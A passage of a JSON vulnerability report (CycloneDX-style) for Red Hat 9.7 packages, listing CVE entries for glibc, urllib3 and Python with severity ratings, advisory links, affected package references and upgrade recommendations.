          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-4438",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        20,
        88
      ],
      "description": "Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C library version 2.34 to version 2.43 could result in an invalid DNS hostname being returned to the caller in violation of the DNS specification.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4438"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4438"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4438"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=34015"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4438"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/03/23/2"
        }
      ],
      "published": "2026-03-20T20:16:49+00:00",
      "updated": "2026-04-07T18:40:02+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-44431",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [],
      "description": "### Impact\n\nWhen following cross-origin redirects for requests made using urllib3\u2019s high-level APIs, such as `urllib3.request()`, `PoolManager.request()`, and `ProxyManager.request()`, sensitive headers \u2014 `Authorization`, `Cookie`, and `Proxy-Authorization` (defined in `Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT`) \u2014 are stripped by default, as expected.\n\nHowever, cross-origin redirects followed from the low-level API via `ProxyManager.connection_from_url().urlopen(..., assert_same_host=False)` still forward these sensitive headers.\n\n### Affected usage\n\nApplications and libraries using urllib3 versions earlier than 2.7.0 may be affected if they allow cross-origin redirects while making requests through `HTTPConnection.urlopen()` instances created via `ProxyManager.connection_from_url()`.\n\n### Remediation\n\nUpgrade to urllib3 version 2.7.0 or later, in which sensitive headers are stripped from redirects followed by `HTTPConnection`.\n\nIf upgrading is not immediately possible, avoid using this low-level redirect flow for cross-origin redirects. If appropriate for your use case, switch to `ProxyManager.request()`.",
      "recommendation": "Upgrade urllib3 to version 2.7.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44431"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc"
        }
      ],
      "affects": [
        {
          "ref": "pkg:pypi/urllib3@2.6.3",
          "versions": [
            {
              "version": "2.6.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:pypi/urllib3@2.6.3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-44432",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [],
      "description": "### Impact\n\nurllib3's [streaming API](https://urllib3.readthedocs.io/en/2.7.0/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.\n\nurllib3 can perform decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API since version 2.6.0, the library decompresses only the necessary bytes, enabling partial content consumption.\n\nHowever, urllib3 before version 2.7.0 could still decompress the whole response instead of the requested portion in two cases:\n1. During the second `HTTPResponse.read(amt=N)` call when the response was decompressed using the official [Brotli](https://pypi.org/project/brotli/) library.\n2. When `HTTPResponse.drain_conn()` was called after the response had been read and decompressed partially (compression algorithm did not matter here).\n\nThese issues could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This could result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side.\n\n\n### Affected usages\n\nApplications and libraries using urllib3 versions earlier than 2.7.0 may be affected when streaming compressed responses from untrusted sources in either of these cases, unless decompression is explicitly disabled:\n\n1. A response encoded with `br` is read incrementally with at least two `HTTPResponse.read(amt=N)` or `HTTPResponse.stream(amt=N)` calls while using the official [Brotli](https://pypi.org/project/brotli/) library.\n2. `HTTPResponse.drain_conn()` is called after response decompression has already started.\n\n\n### Remediation\n\nUpgrade to at least urllib3 version 2.7.0 in which the library:\n1. Is more efficient for reads with Brotli.\n2. Always skips decompression for `HTTPResponse.drain_conn()`.\n\nIf upgrading is not immediately possible, the following workarounds may reduce exposure in specific cases:\n1. For the Brotli-specific issue only, switch from [brotli](https://pypi.org/project/brotli/) to [brotlicffi](https://pypi.org/project/brotlicffi/) until you can upgrade urllib3; the official Brotli package is affected because of https://github.com/google/brotli/issues/1396.\n2. If your code explicitly calls `HTTPResponse.drain_conn()`, call `HTTPResponse.close()` instead when connection reuse is not important.\n\n\n### Credits\n\nThe Brotli-specific issue was reported by @kimkou2024.\n`HTTPResponse.drain_conn()` inefficiency was reported by @Cycloctane.",
      "recommendation": "Upgrade urllib3 to version 2.7.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44432"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j"
        }
      ],
      "affects": [
        {
          "ref": "pkg:pypi/urllib3@2.6.3",
          "versions": [
            {
              "version": "2.6.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:pypi/urllib3@2.6.3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-4786",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        77
      ],
      "description": "Mitigation of\u00a0CVE-2026-4519 was incomplete. If the URL contained \"%action\", the mitigation could be bypassed for certain browser types and the \"webbrowser.open()\" API could have commands injected into the underlying shell. See\u00a0CVE-2026-4519 for details.",
      "recommendation": "Upgrade python-unversioned-command to version 3.9.25-3.el9_7.3; Upgrade python3 to version 3.9.25-3.el9_7.3; Upgrade python3-libs to version 3.9.25-3.el9_7.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4786"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10949"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4786"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-10949.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10949"
        },
        {
          "url": "https://github.com/python/cpython/commit/28b4ad38067bbdad34edfcd03ad2de5f06387e53"
        },
        {
          "url": "https://github.com/python/cpython/commit/c5767a72838a8dda9d6dc5d3558075b055c56bca"
        },
        {
          "url": "https://github.com/python/cpython/commit/d22922c8a7958353689dc4763dd72da2dea03fff"
        },
        {
          "url": "https://github.com/python/cpython/commit/d6d68494be70bdbda20f89f83801ba52ec37daa4"
        },
        {
          "url": "https://github.com/python/cpython/commit/f4654824ae0850ac87227fb270f9057477946769"
        },
        {
          "url": "https://github.com/python/cpython/issues/148169"
        },
        {
          "url": "https://github.com/python/cpython/pull/148170"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-4786.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-11077.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/JQDUNJVB4AQNTJECSUKOBDU3XCJIPSE5/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4786"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4786"
        }
      ],
      "published": "2026-04-13T22:16:30+00:00",
      "updated": "2026-04-29T16:16:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
